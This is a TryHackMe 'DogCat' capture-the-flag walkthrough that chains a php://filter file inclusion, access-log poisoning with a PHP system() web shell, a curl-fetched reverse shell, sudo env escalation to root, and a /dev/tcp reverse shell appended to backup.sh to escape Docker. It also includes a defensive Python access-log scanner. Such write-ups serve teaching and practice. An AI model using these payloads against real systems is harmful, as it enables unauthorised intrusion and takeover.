DogCat

Hello guys and welcome to yet another TryHackMe writeup. Today we will be handling a medium-difficulty room, which is accessible here.

The methodology is quite similar to the one from the Archangel room, with a twist. Let's begin.

ACCESSING THE WEBPAGE

I ran an Nmap scan first, but it was not very productive, so I went straight to the site.

The site has two buttons; clicking dog, for example, returns a picture of a dog.

Looking closely at the URL, we see that it uses a view parameter. That is interesting. Let us try to traverse it using the php://filter wrapper: php://filter/convert.base64-encode/resource=./dog/../index.

We then get a base64 string back. Let us decode it.

We get back some PHP code, and looking closely at its filters we see that an ext parameter can be used to remove the .php extension that is automatically appended to the requested file.

ACCESS LOGS

Let us use this parameter to view the access logs.

Success! Next we are going to poison the log through the User-Agent header using <?php system($_GET['cmd']);?>.

If you are not familiar with how to do that, check the Archangel writeup.

Next, let us try to run a command by appending &cmd=whoami to the request.

We can see that we are www-data.
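From the defender's side, both the php://filter traversal and the User-Agent poisoning above leave recognisable traces in the web server's access log. The following is an added Python example, not code from the original post: it parses combined-format log lines (the format regex and the sample log lines are my own constructed assumptions) and flags stream wrappers, directory traversal, and PHP tags smuggled in through the User-Agent.

```python
import re
from urllib.parse import unquote

# Apache "combined" format: client ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Indicators from the writeup: a stream wrapper in the include parameter, directory traversal, PHP tags in User-Agent.
WRAPPER_RE = re.compile(r'(?i)\b(php|data|expect|phar)://')
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')
PHP_TAG_RE = re.compile(r'(?i)<\?(php|=)')

def analyse_line(line):
    """Return (indicator, detail) tuples for one access-log line; [] if clean."""
    m = LOG_RE.match(line.strip())
    if not m:
        return [('unparsed', line.strip())]
    # Decode once so %2e%2e%2f-style encoding cannot hide the traversal.
    request = unquote(m.group('request'))
    agent = unquote(m.group('agent'))
    findings = []
    if WRAPPER_RE.search(request):
        findings.append(('stream_wrapper', request))
    if TRAVERSAL_RE.search(request):
        findings.append(('path_traversal', request))
    if PHP_TAG_RE.search(agent):
        findings.append(('log_poisoning', agent))
    return findings

def scan(log_text):
    """Scan a whole log; returns {line_number: findings} for lines that hit."""
    hits = {}
    for n, line in enumerate(log_text.splitlines(), start=1):
        found = analyse_line(line)
        if found:
            hits[n] = found
    return hits

# Constructed sample log (not captured from the room or the original post).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:12:00:01 +0000] "GET /?view=php://filter/convert.base64-encode/resource=./dog/../index HTTP/1.1" 200 2048 "-" "curl/7.88"
10.0.0.9 - - [01/Jan/2024:12:00:02 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "<?php system($_GET['cmd']);?>"
10.0.0.9 - - [01/Jan/2024:12:00:03 +0000] "GET /?view=dog%2f..%2f..%2fetc%2fpasswd&ext= HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```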

REVERSE SHELL

Now we are going to try to get a reverse shell. We can get one from pentestmonkey. Make sure to change the IP and port to match your listener.

Next we are going to run a Python web server on our machine with python -m http.server 80, then fetch the shell onto the target with &cmd=curl -o revshell.php ip/revshell.php.

Using wget was not successful for me. Check the Python server's output for a 200 status code to confirm the download. With that done, start the listener on our machine, run &cmd=php revshell.php, and check back for a connection.

Smooth!

ROOT

Next we are going to run sudo -l, which checks what we are allowed to run with sudo.

We see that www-data can run env as root. Looking at GTFOBins, we can exploit this with sudo env /bin/sh.

And we are root.

ESCAPING DOCKER

This was not straightforward, since the last flag is outside the container, but it is not that hard.

Moving around, we find a file backup.sh that links the host and the container. We can exploit this by appending a reverse shell to it with the following command.

echo "bash -i >& /dev/tcp/ip/port 0>&1" >> backup.sh

Then start a listener on your machine and, once it connects, we are in the host.

RESOURCES

  1. BASH FOR BEGINNERS
  2. PHP TRICKS

Be sure to read the articles above for a much better understanding. Happy hacking :)